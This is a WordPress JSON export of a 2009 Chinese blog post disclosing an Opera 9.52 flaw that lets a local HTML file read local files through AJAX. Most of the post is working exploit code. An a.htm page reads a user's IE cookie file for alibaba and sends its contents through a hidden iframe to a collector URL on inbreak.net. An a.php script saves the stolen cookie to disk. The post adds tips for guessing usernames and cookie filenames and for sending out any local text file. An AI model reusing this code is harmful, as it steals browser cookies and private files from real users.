{"id":141,"date":"2009-01-05T12:08:38","date_gmt":"2009-01-05T12:08:38","guid":{"rendered":""},"modified":"2011-04-25T08:38:39","modified_gmt":"2011-04-25T08:38:39","slug":"opera-9-52%e4%bd%bf%e7%94%a8ajax%e8%af%bb%e5%8f%96%e6%9c%ac%e5%9c%b0%e6%96%87%e4%bb%b6%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/141.html","title":{"rendered":"opera 9.52\u4f7f\u7528ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6f0f\u6d1e"},"content":{"rendered":"

by \u7a7a\u865a\u6d6a\u5b50\u5fc3<\/p>\n

\u8fd9\u4e5f\u53ef\u80fd\u662f\u4e00\u4e2a\u5b89\u5168\u7279\u6027\u5427\uff0copera\u53ef\u4ee5\u4f7f\u7528ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u3002<\/p>\n

ff3\u6ca1\u6709\u8fd9\u4e2a\u6f0f\u6d1e\u3002<\/p>\n

\u4e0d\u5e9f\u8bdd\uff0c\u770b\u4ee3\u7801\u5427\u3002<\/p>\n

\u5229\u7528\u65b9\u5f0f\u5982\u4e0b\uff1a<\/p>\n

\u8fd9\u6bb5\u4ee3\u7801\u4fdd\u5b58\u4e3a\u672c\u5730htm\u6587\u4ef6\uff0c\u7136\u540e\u4f7f\u7528opera\u6253\u5f00\u3002<\/p>\n

\u5c06\u4f1a\u628a\u672c\u5730\u7528\u6237\u540d\u4e3aadministrator\u7684\u7528\u6237\u5728alibaba\u7684cookie\u6587\u4ef6\u5185\u5bb9\uff0c\u53d1\u9001\u5230http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php<\/p>\n

<\/span><\/span><\/p>\n

\n
a.htm \u4ee3\u7801<\/div>\n
    \n
  1. <<\/span>iframe<\/span> <\/span>id<\/span>=<\/span>"framekxlzx"<\/span> <\/span>width<\/span>=<\/span>0<\/span> <\/span>height<\/span>=<\/span>0<\/span>><\/span><\/<\/span>iframe<\/span>><\/span>  <\/span><\/span><\/li>\n
  2. <<\/span>script<\/span>><\/span>  <\/span><\/span><\/li>\n
  3. var xmlHttp;  <\/span><\/li>\n
  4. function createXMLHttp(){  <\/span><\/li>\n
  5.     if(window.XMLHttpRequest){  <\/span><\/li>\n
  6.         xmlHttp<\/span> = <\/span>new<\/span> XMLHttpRequest();          <\/span><\/span><\/li>\n
  7.     }  <\/span><\/li>\n
  8.     else if(window.ActiveXObject){  <\/span><\/li>\n
  9.         xmlHttp<\/span> = <\/span>new<\/span> ActiveXObject("Microsoft.XMLHTTP");  <\/span><\/span><\/li>\n
  10.     }  <\/span><\/li>\n
  11. }  <\/span><\/li>\n
  12.   <\/span><\/li>\n
  13. function startRequest(doUrl){  <\/span><\/li>\n
  14.           <\/span><\/li>\n
  15.     createXMLHttp();  <\/span><\/li>\n
  16.       <\/span><\/li>\n
  17.     xmlHttp.onreadystatechange<\/span> = <\/span>handleStateChange<\/span>;  <\/span><\/span><\/li>\n
  18.       <\/span><\/li>\n
  19.     xmlHttp.open("GET", doUrl, true);  <\/span><\/li>\n
  20.       <\/span><\/li>\n
  21.     xmlHttp.send(null);  <\/span><\/li>\n
  22.       <\/span><\/li>\n
  23.       <\/span><\/li>\n
  24. }   <\/span><\/li>\n
  25.   <\/span><\/li>\n
  26. function handleStateChange(){  <\/span><\/li>\n
  27.     if (xmlHttp.readyState<\/span> == 4 ){  <\/span><\/span><\/li>\n
  28.             var strResponse<\/span> = <\/span>""<\/span>;  <\/span><\/span><\/li>\n
  29.             setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);   <\/span><\/li>\n
  30.               <\/span><\/li>\n
  31.     }  <\/span><\/li>\n
  32. }  <\/span><\/li>\n
  33.   <\/span><\/li>\n
  34. function doMyAjax(user,file)  <\/span><\/li>\n
  35. {  <\/span><\/li>\n
  36.         var time<\/span> = <\/span>Math<\/span>.random();  <\/span><\/span><\/li>\n
  37.           <\/span><\/li>\n
  38.         var strPer<\/span> = <\/span>‘file:\/\/localhost\/C:\/Documents%20and%20Settings\/’<\/span>+user+’\/Cookies\/’+file+’?<\/span>time<\/span>=’+time;  <\/span><\/span><\/li>\n
  39.           <\/span><\/li>\n
  40.         startRequest(strPer);  <\/span><\/li>\n
  41.       <\/span><\/li>\n
  42. }  <\/span><\/li>\n
  43.   <\/span><\/li>\n
  44. function framekxlzxPost(text)  <\/span><\/li>\n
  45. {  <\/span><\/li>\n
  46.     document.getElementById(‘framekxlzx’).src<\/span>=<\/span>"http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php?cookie="<\/span>+escape(text);  <\/span><\/span><\/li>\n
  47.     alert(\/ok\/);  <\/span><\/li>\n
  48. }  <\/span><\/li>\n
  49.   <\/span><\/li>\n
  50. doMyAjax(‘administrator’,’administrator@alibaba[1].txt’);  <\/span><\/li>\n
  51.   <\/span><\/li>\n
  52. <\/<\/span>script<\/span>><\/span>  <\/span><\/span><\/li>\n<\/ol>\n<\/div>\n

    a.php\u4ee3\u7801\uff1a<\/p>\n

    \n
    a.php \u4ee3\u7801<\/div>\n
      \n
    1. <?php      <\/span><\/span><\/li>\n
    2.    <\/span><\/li>\n
    3. $user_IP<\/span> = (<\/span>$_SERVER<\/span>[<\/span>"HTTP_VIA"<\/span>]) ? <\/span>$_SERVER<\/span>[<\/span>"HTTP_X_FORWARDED_FOR"<\/span>] : <\/span>$_SERVER<\/span>[<\/span>"REMOTE_ADDR"<\/span>];  <\/span><\/span><\/li>\n
    4. $user_IP<\/span> = (<\/span>$user_IP<\/span>) ? <\/span>$user_IP<\/span> : <\/span>$_SERVER<\/span>[<\/span>"REMOTE_ADDR"<\/span>];   <\/span><\/span><\/li>\n
    5.   <\/span><\/li>\n
    6. $fp<\/span> = <\/span>fopen<\/span>(<\/span>$user_IP<\/span>.<\/span>date<\/span>(<\/span>"Y-m-d H:i:s"<\/span>).<\/span>"cookie.txt"<\/span>,<\/span>"wb"<\/span>);     <\/span><\/span><\/li>\n
    7. fwrite($fp<\/span>,<\/span>$_GET<\/span>[<\/span>"cookie"<\/span>]);      <\/span><\/span><\/li>\n
    8. fclose($fp<\/span>);    <\/span><\/span><\/li>\n
    9. ?>     <\/span><\/li>\n<\/ol>\n<\/div>\n

      a.php\u4f1a\u6309\u7167   IP+\u65f6\u95f4+cookie.txt \u683c\u5f0f\u751f\u6210\u4e00\u4e2atxt\u6587\u4ef6\u3002<\/p>\n

      \u4f8b\u5982\uff1a121.0.29.2252009-01-05 11:55:02cookie.txt\uff08IP 121.0.29.225 + \u65f6\u95f4 2009-01-05 11:55:02 + cookie.txt\uff09<\/p>\n

      \u91cc\u9762\u4fdd\u5b58\u7740administrator@alibaba[1].txt\u7684\u5185\u5bb9\u3002<\/p>\n

      \u51e0\u70b9\u8bf4\u660e\uff1a
      \n1\uff0ccookie\u6587\u4ef6\u662fIE\u7684\uff0c\u6bd4\u8f83XX\uff0c\u4f46\u662f\u6709\u5f88\u591a\u4eba\u90fd\u4f1aIE\u548copera\u6df7\u7528\u3002
      \n2\uff0c\u5fc5\u987b\u9884\u6d4b\u672c\u5730\u7528\u6237\u540d\uff0c\u4e0d\u8fc7\u5f88\u591a\u4eba\u90fd\u662fadministrator\u3002
      \n3\uff0c\u5fc5\u987b\u9884\u6d4bcookie\u6587\u4ef6\u540d\u3002\u8fd9\u4e2a\u53ef\u4ee5\u53d6\u4e00\u4e9b\u5e38\u7528\u7f51\u7ad9\u7684\uff0c\u53cd\u6b63ajax\u662f\u5f02\u6b65\uff0c\u4f60\u53ef\u4ee5\u540c\u65f6\u8c03\u7528\u51e0\u4e2a\u65b9\u6cd5\u3002
      \n4\uff0c\u6216\u8005\u4f60\u53ef\u4ee5\u53d1\u9001\u4efb\u4f55\u672c\u5730TXT\u6587\u4ef6\u3002<\/p>\n

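      opera\u53ef\u80fd\u8bf4\u8fd9\u662f\u7279\u6027\uff1f\u4e0d\u77e5\u9053\u4e86\uff0c\u53cd\u6b63FF3\u6ca1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u4f7f\u7528\u8fd9\u79cd\u65b9\u5f0f\u4f1a\u62a5\u9519\u8bbf\u95ee\u62d2\u7edd\u3002\u95ee\u9898\u5728\u4e8e\uff1a\u672c\u5730htm\u6587\u4ef6\u53ef\u4ee5\u4f7f\u7528ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\uff0c\u7136\u540e\u53d1\u9001\u5230http\u7f51\u7ad9\u3002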
      \n<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"

      \u8fd9\u4e5f\u53ef\u80fd\u662f\u4e00\u4e2a\u5b89\u5168\u7279\u6027\u5427\uff0copera\u53ef\u4ee5\u4f7f\u7528ajax\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u3002<\/p>\n

      ff3\u6ca1\u6709\u8fd9\u4e2a\u6f0f\u6d1e\u3002<\/p>\n

      \u4e0d\u5e9f\u8bdd\uff0c\u770b\u4ee3\u7801\u5427\u3002<\/p>\n

      \u5229\u7528\u65b9\u5f0f\u5982\u4e0b\uff1a<\/p>\n

      \u8fd9\u6bb5\u4ee3\u7801\u4fdd\u5b58\u4e3a\u672c\u5730htm\u6587\u4ef6\uff0c\u7136\u540e\u4f7f\u7528opera\u6253\u5f00\u3002<\/p>\n

      \u5c06\u4f1a\u628a\u672c\u5730\u7528\u6237\u540d\u4e3aadministrator\u7684\u7528\u6237\u5728alibaba\u7684cookie\u6587\u4ef6\u5185\u5bb9\uff0c\u53d1\u9001\u5230http:\/\/inbreak.net\/kxlzxtest\/testxss\/a.php<\/span><\/span><\/p>\n

      \u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,5],"tags":[34,35],"views":3928,"_links":{"self":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/141"}],"collection":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/comments?post=141"}],"version-history":[{"count":1,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/141\/revisions"}],"predecessor-version":[{"id":235,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/141\/revisions\/235"}],"wp:attachment":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/media?parent=141"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/categories?post=141"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/tags?post=141"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}